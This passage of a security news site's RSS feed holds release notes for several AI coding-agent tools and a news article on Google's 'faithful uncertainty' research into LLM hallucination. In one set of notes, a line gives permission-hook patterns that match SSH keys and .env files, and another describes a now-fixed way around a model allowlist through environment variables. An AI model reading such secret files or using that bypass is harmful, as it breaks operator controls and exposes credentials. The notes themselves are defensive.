<li>Mnemopi <code>per-project</code> / <code>per-project-tagged</code> bank derivation is now stable for one cwd, ignoring the surrounding git layout. Previously the bank id was hashed from <code>git.repo.resolveSync(cwd)?.repoRoot ?? path.resolve(cwd)</code>, so adding or removing a <code>.git</code> anywhere above the working directory silently repointed the same conversation to a new bank and stranded its memories (e.g. <code>/home/x/projects/repo</code> flipping between <code>projects-…</code> and <code>repo-…</code>). The derivation in <code>packages/coding-agent/src/mnemopi/config.ts</code> now hashes <code>path.resolve(cwd)</code> directly, and session startup widens the recall set with any sibling bank under <code>&lt;dbDir&gt;/banks/</code> whose <code>working_memory</code> rows already carry the active cwd in <code>metadata_json.$.cwd</code>, so memories stranded by the old, less-stable derivation become visible again on the next session without manual migration (<a href="https://github.com/can1357/oh-my-pi/issues/2412" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2412/hovercard">#2412</a>).</li>
<li>Fixed model switching (Ctrl+P role cycling and the alt+p / <code>/switch</code> / <code>/models</code> selector) intermittently freezing the UI for several seconds. <code>AgentSession.setModel</code>/<code>setModelTemporary</code> ran an eager <code>await modelRegistry.getApiKey(model)</code> purely as an existence pre-flight and discarded the value — but <code>getApiKey</code> does real work: it synchronously executes command-backed key programs (<code>apiKey: "!cmd"</code>, <code>execSync</code> with a 10s timeout, blocking the event loop) and refreshes OAuth tokens over the network when one crosses the expiry window (the "fine for a few switches, then a multi-second stall" symptom). Switching now uses the synchronous, side-effect-free <code>ModelRegistry.hasConfiguredAuth</code> check; the concrete key (command execution + OAuth refresh) is still resolved lazily per request via the existing resolver, so an unconfigured provider still fails fast with <code>No API key</code> while a healthy switch never touches the network or spawns a subprocess. <code>hasConfiguredAuth</code> no longer runs the command program or refreshes tokens either, matching its documented "probe without resolving an API key" contract.</li>
<li>Fixed session resume (<code>pi -c</code> / <code>--continue</code> / <code>--session</code>) hanging for ~10s at startup — surfaced by the watchdog as <code>Still starting … phase: createAgentSession &gt; restoreSessionModel</code> — when an OAuth token needed refreshing or the auth broker (<code>OMP_AUTH_BROKER_URL</code>) was unreachable. Picking which saved model to restore is a pure <em>selection</em> that only needs to know whether auth is configured, but <code>restoreSessionModel</code> probed each candidate with the async <code>getApiKey</code>, which refreshes OAuth tokens over the network, executes command-backed key programs, and issues auth-broker requests — so a slow or unreachable endpoint stalled resume for the full refresh timeout per candidate. Startup model selection now uses the synchronous, side-effect-free <code>ModelRegistry.hasConfiguredAuth</code> probe (the same fix already applied to interactive model switching); the concrete key is still resolved lazily on the first request via the resolver.</li>
</ul>
<h2>@oh-my-pi/collab-web</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed context usage percentage calculations to return null when context window is missing or non-positive, preventing invalid or Infinity/NaN usage display</li>
</ul>
<h2>@oh-my-pi/pi-mnemopi</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>consolidateToEpisodic</code> (the function backing <code>sleep</code> / <code>sleepAllSessions</code>) never populating the episodic graph: the <code>gists</code> and <code>graph_edges</code> tables stayed at 0 rows across every bank even after multiple consolidation cycles, so Polyphonic Recall's <code>graph</code> voice (BFS over <code>findGistsByParticipant</code> / <code>findRelatedMemories</code>) always returned nothing. Consolidation now best-effort ingests the new episodic memory into <code>EpisodicGraph</code> so the gist row, gist→memory <code>ctx</code> edge, fact edges, and cross-memory similarity/entity/temporal edges land alongside the episodic row. Independent of the existing <code>MNEMOPI_PROACTIVE_LINKING</code> flag, which still gates the same enrichment on the <code>remember()</code> write path. (<a href="https://github.com/can1357/oh-my-pi/issues/2435" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2435/hovercard">#2435</a>)</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed native shell execution rejecting quoted heredocs whose closing delimiter is the final line without a trailing newline, matching bash paste-run snippets.</li>
</ul>
<h2>@oh-my-pi/omp-stats</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed the stats dashboard's SQLite init never setting <code>PRAGMA busy_timeout</code>, so a concurrent <code>omp</code> startup hitting WAL recovery could crash <code>initDb()</code> with <code>SQLITE_BUSY</code> instead of waiting through it. The busy handler is now installed before <code>PRAGMA journal_mode=WAL</code> (<a href="https://github.com/can1357/oh-my-pi/issues/2421" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2421/hovercard">#2421</a>).</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li><code>PI_FORCE_HYPERLINKS=1</code> / <code>PI_NO_HYPERLINKS=1</code> env overrides for the OSC 8 hyperlink capability, mirroring the <code>PI_FORCE_SYNC_OUTPUT</code>/<code>PI_NO_SYNC_OUTPUT</code> shape (opt-out beats force-on).</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Auto-enable OSC 8 hyperlinks inside tmux when tmux self-reports &gt;= 3.4 via <code>TERM_PROGRAM_VERSION</code>; tmux 3.4 stores OSC 8 as a cell attribute and forwards it to outer terminals whose <code>terminal-features</code> include <code>hyperlinks</code>. Older tmux, GNU screen, and tmux without a reported version still default off. Resolution is factored into <code>hyperlinksUserOverride()</code> and <code>shouldEnableHyperlinksByDefault()</code> mirroring the sync-output helpers (<a href="https://github.com/can1357/oh-my-pi/issues/2403" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2403/hovercard">#2403</a>).</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed abortable stream wrappers to cancel the source stream on abort, so timeout watchdogs release upstream HTTP bodies instead of only stopping the local reader.</li>
</ul>
<h2>@oh-my-pi/pi-wire</h2>
<h3>Changed</h3>
<ul>
<li>Changed <code>WireModel.contextWindow</code> and <code>ContextUsage.contextWindow</code> to <code>number | null</code> to allow representing unavailable context-window values</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(tui): respect OSC 8 hyperlinks under tmux &gt;= 3.4 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4650944240" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2404" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2404/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2404">#2404</a></li>
<li>fix(skills): load ~/.agents/skills even when third-party source toggles are off by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651011756" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2405" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2405/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2405">#2405</a></li>
<li>fix(coding-agent): stabilize mnemopi per-project bank derivation (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651832873" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2412" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2412/hovercard" href="https://github.com/can1357/oh-my-pi/issues/2412">#2412</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651944937" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2414" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2414/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2414">#2414</a></li>
<li>fix(auth): retried SQLITE_BUSY family and hoisted busy_timeout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652322896" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2423" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2423/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2423">#2423</a></li>
<li>fix(ai): added GITLAB_CLIENT_ID and GITLAB_REDIRECT_URI overrides for gitlab-duo OAuth by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652454808" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2425" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2425/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2425">#2425</a></li>
<li>fix(coding-agent): restore Windows image paste fallback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652851725" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2430" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2430/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2430">#2430</a></li>
<li>fix(ai): deduplicate MiniMax reasoning stream by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654022523" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2434" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2434/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2434">#2434</a></li>
<li>fix(mnemopi): populated gists and graph_edges during consolidation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654648195" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2439" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2439/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2439">#2439</a></li>
<li>fix: align Mermaid ASCII box borders for CJK/emoji labels by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chan1103/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chan1103">@chan1103</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654744037" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2442" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2442/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2442">#2442</a></li>
<li>docs: document project settings and disabledProviders by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655013563" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2448" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2448/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2448">#2448</a></li>
<li>fix(cli): defer goal objectives while streaming by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655927611" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2455" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2455/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2455">#2455</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.12.3...v15.12.4"><tt>v15.12.3...v15.12.4</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.48.0-nightly.20260613.g9e5599c32]]></title>
<description><![CDATA[What's Changed

fix(core): implement atomic update in MCP tool discovery by @luisfelipe-alt in #27619
Vertex ai model mapping fix by @DavidAPierce in #27749
Add documentation and migration commands for Antigravity CLI by @DavidAPierce in #27765
Avoid persisting empty resume sessions by @SandyTao5...]]></description>
<link>https://tsecurity.de/de/3594771/downloads/release-v0480-nightly20260613g9e5599c32/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594771/downloads/release-v0480-nightly20260613g9e5599c32/</guid>
<pubDate>Sat, 13 Jun 2026 02:31:41 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>fix(core): implement atomic update in MCP tool discovery by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luisfelipe-alt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luisfelipe-alt">@luisfelipe-alt</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565539001" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27619" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27619/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27619">#27619</a></li>
<li>Vertex ai model mapping fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidAPierce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidAPierce">@DavidAPierce</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616892781" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27749" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27749/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27749">#27749</a></li>
<li>Add documentation and migration commands for Antigravity CLI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidAPierce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidAPierce">@DavidAPierce</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625182215" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27765" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27765/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27765">#27765</a></li>
<li>Avoid persisting empty resume sessions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SandyTao520/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SandyTao520">@SandyTao520</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625604569" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27770" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27770/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27770">#27770</a></li>
<li>chore(release): bump version to 0.48.0-nightly.20260609.g3a13b8eeb by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4627893739" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27779" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27779/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27779">#27779</a></li>
<li>ci(dependabot): enable cooldown period for npm packages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ruomengz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ruomengz">@ruomengz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613795997" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27743" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27743/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27743">#27743</a></li>
<li>refactor(core): standardize tool output formatting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625973163" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27772" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27772/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27772">#27772</a></li>
<li>ci: update workflow logging and policy configurations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4644136716" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27853" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27853/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27853">#27853</a></li>
<li>fix(core): Ensure zero-quota limits fail fast to prevent retry loop hang by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luisfelipe-alt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luisfelipe-alt">@luisfelipe-alt</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598585248" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27698" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27698/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27698">#27698</a></li>
<li>fix(core): handle multi-line escaped quotes in stripShellWrapper by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanchezcoraspe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanchezcoraspe">@sanchezcoraspe</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528910595" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27467" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27467/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27467">#27467</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luisfelipe-alt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luisfelipe-alt">@luisfelipe-alt</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565539001" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27619" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27619/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27619">#27619</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanchezcoraspe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanchezcoraspe">@sanchezcoraspe</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528910595" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27467" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27467/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27467">#27467</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google-gemini/gemini-cli/compare/v0.47.0-nightly.20260609.g0567b25a2...v0.48.0-nightly.20260613.g9e5599c32"><tt>v0.47.0-nightly.20260609.g0567b25a2...v0.48.0-nightly.20260613.g9e5599c32</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.176]]></title>
<description><![CDATA[What's changed

Session titles are now generated in the language of your conversation (set the language setting to pin a specific language)
Added footerLinksRegexes setting for regex-matched link badges in the footer row, configurable via user or managed settings
Improved Bedrock credential cachi...]]></description>
<link>https://tsecurity.de/de/3594642/downloads/v21176/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594642/downloads/v21176/</guid>
<pubDate>Sat, 13 Jun 2026 00:21:02 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Session titles are now generated in the language of your conversation (set the <code>language</code> setting to pin a specific language)</li>
<li>Added <code>footerLinksRegexes</code> setting for regex-matched link badges in the footer row, configurable via user or managed settings</li>
<li>Improved Bedrock credential caching: credentials from <code>awsCredentialExport</code> are now cached until their <code>Expiration</code> instead of a fixed 1 hour</li>
<li>Fixed <code>availableModels</code> enforcement: alias model picks can no longer be redirected to a blocked model via <code>ANTHROPIC_DEFAULT_*_MODEL</code> environment variables, and <code>/fast</code> now refuses to toggle when it would switch to a model outside the allowlist</li>
<li>Fixed auto mode failing on Fable 5 for organizations without Opus 4.8 enabled — the classifier now falls back to the best available Opus model</li>
<li>Fixed hook <code>if</code> conditions for Read/Edit/Write tool paths: documented patterns like <code>Edit(src/**)</code>, <code>Read(~/.ssh/**)</code>, and <code>Read(.env)</code> now match correctly</li>
<li>Fixed Linux sandbox failing to start when <code>.claude/settings.json</code> is a symlink with an absolute target</li>
<li>Fixed <code>/copy</code> and mouse-selection copy not reaching the system clipboard inside tmux over SSH, and tmux paste buffer not loading on versions older than 3.2</li>
<li>Fixed Remote Control connecting from web/mobile silently switching the session's model</li>
<li>Fixed Remote Control disconnect notifications showing a bare numeric code instead of a human-readable reason, and connection failures adding a duplicate line to the conversation transcript</li>
<li>Fixed Remote Control sessions not disconnecting when you sign in to a different account</li>
<li>Fixed <code>/cd</code> and worktree moves leaving the session reporting the previous directory's git branch</li>
<li>Fixed <code>claude agents</code>: pressing back in one window no longer detaches other windows attached to the same session</li>
<li>Fixed backgrounded sessions showing "Working" forever when <code>/bg</code> mid-turn had nothing left to continue</li>
<li>Fixed background agent search by PR URL: PRs opened during scheduled wakeups or while a job was blocked now appear in <code>claude agents</code> search</li>
<li>Fixed the agents view input showing no text cursor on Windows</li>
<li>Fixed <code>claude --bg -cn &lt;name&gt;</code> not seeding the session name</li>
<li>Fixed background sessions to neutralize Windows network paths in persisted state before respawn</li>
<li>Fixed background-session respawn rejecting malformed resume IDs from corrupted state files</li>
<li>Fixed the Windows background-service daemon not starting when <code>~/.claude/daemon</code> has the ReadOnly attribute set</li>
<li>Fixed cloud sessions failing with "Could not resolve authentication method" when idle for too long before being claimed</li>
<li>Background sessions now show clearer guidance when a window left open across an auto-update can't submit a reply, and <code>claude daemon status</code> explains version-skew behavior</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google researchers introduce 'faithful uncertainty', allowing LLMs to offer best guesses instead of hallucinations]]></title>
<description><![CDATA[Large language models continue to struggle with hallucinations, presenting a major roadblock for real-world enterprise applications. Reducing these errors is a messy business, forcing model developers to navigate a strict tradeoff where eliminating factual errors often suppresses valid answers.In...]]></description>
<link>https://tsecurity.de/de/3594591/it-nachrichten/google-researchers-introduce-faithful-uncertainty-allowing-llms-to-offer-best-guesses-instead-of-hallucinations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594591/it-nachrichten/google-researchers-introduce-faithful-uncertainty-allowing-llms-to-offer-best-guesses-instead-of-hallucinations/</guid>
<pubDate>Fri, 12 Jun 2026 23:39:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Large language models continue to struggle with hallucinations, presenting a major roadblock for real-world enterprise applications. Reducing these errors is a messy business, forcing model developers to navigate a strict tradeoff where eliminating factual errors often suppresses valid answers.</p><p>In a <a href="https://arxiv.org/abs/2605.01428">new paper</a>, Google researchers introduce the concept of "faithful uncertainty," a metacognitive technique that aligns a model's response with its internal confidence. This alignment allows the model to offer appropriately hedged hypotheses, such as "My best guess is," instead of defaulting to an unhelpful "answer-or-abstain" binary.</p><p>In real-world agentic AI applications, this metacognitive awareness acts as an essential control layer. It empowers autonomous systems to accurately determine when their internal knowledge is sufficient and when they must dynamically trigger external tools or search APIs to resolve deficits.</p><h2>The utility tax of current mitigation strategies</h2><p>Understanding <a href="https://venturebeat.com/ai/google-deepmind-researchers-introduce-new-benchmark-to-improve-llm-factuality-reduce-hallucinations">why LLMs hallucinate</a> hinges on separating two capabilities: a model knowing facts versus knowing what is known. Historically, most factuality gains in AI have come from expanding the knowledge boundary, meaning developers simply pack more facts into the model's parameters through larger scale and more training data.</p><p>However, expanding a model's knowledge does not automatically improve its boundary awareness, which is its ability to distinguish the known from the unknown and recognize its own limitations.</p><p>“There are broadly two ways to improve LLM factuality,” Gal Yona, Research Scientist at Google and co-author of the paper, told VentureBeat. The first is continuing to teach the model more facts. But, Yona notes, “model capacity is finite, and the long tail of knowledge is effectively infinite.” </p><p>Once models hit this limit, the hope is they know what they don't know and simply abstain from answering. However, this is inherently difficult for LLMs.</p><p>“This is why most practical attempts to reduce hallucinations through various interventions don't actually make it to deployment,” Yona explains. “They do reduce hallucinations, but they also hurt utility, because the model ends up refusing to answer questions it actually does know.”</p><p>This inability to distinguish between knowns and unknowns creates what the paper's authors call the "utility tax." Enforcing a zero-hallucination standard requires the model to abstain whenever it is even slightly uncertain, discarding massive volumes of completely valid information. For example, the authors demonstrate that reducing an underlying 25% error rate down to a strict 5% target forces developers to discard 52% of the model's correct answers.</p><p>Treating all errors as hallucinations forces enterprise systems to choose between trustworthiness and helpfulness. Application developers are generally unwilling to pay this massive utility tax and render their models unhelpful. </p><p>Consequently, they optimize systems to prioritize coverage, forcing models to operate in a state where they continue to generate confident hallucinations.</p><h2>Reframing hallucinations as confident errors</h2><p>To move past the utility tax, the researchers propose to stop treating any factual error as a hallucination. Instead, they reframe hallucinations as "confident errors": incorrect information delivered authoritatively without appropriate qualification.</p><p>This subtle reframing dissolves the strict "answer-or-abstain" dichotomy and allows the model to express its uncertainty. </p><p>In this new framework, if a model makes a factual mistake but appropriately hedges its response (e.g., by stating, "I am not completely sure, but I think..."), it isn't a hallucination. It is simply a hypothesis offered to the user for consideration. By expressing uncertainty, the AI preserves its utility—sharing whatever partial or likely knowledge it has—without violating the user's trust.</p><p>However, if an AI assistant hedges all its responses with a disclaimer, the user is forced to double-check everything, defeating the purpose of the tool entirely.</p><p>The solution the researchers propose is "faithful uncertainty." This approach requires aligning a model's linguistic uncertainty, or the words it uses to express doubt, with its intrinsic uncertainty, which is its actual, internal statistical confidence in that specific answer. This ensures the model only hedges when its internal state genuinely reflects conflicting or low-probability information.</p><p>Faithful uncertainty forms a core component of “metacognition,” the AI's ability to be aware of its own uncertainty and act on it. To understand this practically, consider the intuitive example of consulting a doctor. We do not trust doctors because they are all-knowing. We trust them because they reliably distinguish between a confident diagnosis ("You have a fracture") and an educated hypothesis ("It might be a sprain, but let's run some tests").</p><h2>Practical implications for enterprise AI</h2><p>Under the new framing, errors where a model is genuinely confident but factually incorrect are categorized as “honest mistakes.” This casts knowledge expansion (training the model on more data) and faithful uncertainty as completely complementary efforts. Knowledge expansion pushes the absolute knowledge boundary outward to minimize honest mistakes, while faithful uncertainty honestly communicates wherever that boundary currently lies.</p><p>This new framing has important implications for agentic applications. The shift to agentic AI might make it seem like knowing what the model doesn't know is redundant, since models can just search external databases. However, access to external tools actually amplifies the need for faithful uncertainty. In agentic systems, metacognition becomes the central control layer that governs the entire system.</p><p>External tools solve the storage problem because the model no longer needs to encode every fact into its parameters. However, this introduces a new control problem: managing when to retrieve information, verify facts, and orchestrate these external tools. Without faithful uncertainty, an agent is essentially flying blind and must rely on external, static heuristics or over-engineered scaffolds.</p><p>“The model might search for something it already knows confidently—wasting latency and cost for no gain. Or the opposite: it confidently answers from memory when it should have searched, producing a plausible but wrong output,” Yona said. Today’s agent harnesses try to solve this externally with query classifiers or always-search rules, but Yona notes that these are "static and brittle." By using its intrinsic uncertainty to regulate its own behavior, the agent dynamically optimizes its tool use, choosing to invoke a search tool only when its internal confidence is genuinely low.</p><p>Beyond deciding when to search, faithful uncertainty is critical for evaluating the results of a search. If a tool returns low-quality or unexpected information, a metacognitive agent does not blindly accept whatever appears in its context window. Instead, it uses its uncertainty awareness to weigh the retrieved external signals against its own internal priors. This prevents sycophantic behavior where the system might otherwise trust external sources that conflict with its actual known knowledge.</p><h2>The bootstrapping paradox: The catch to teaching uncertainty</h2><p>For enterprise builders, achieving this faithful uncertainty is trickier than it sounds. It requires teaching models the syntax of uncertainty through supervised fine-tuning (SFT). Because pre-trained models are mostly fed authoritative text, they must be explicitly taught to say things like, 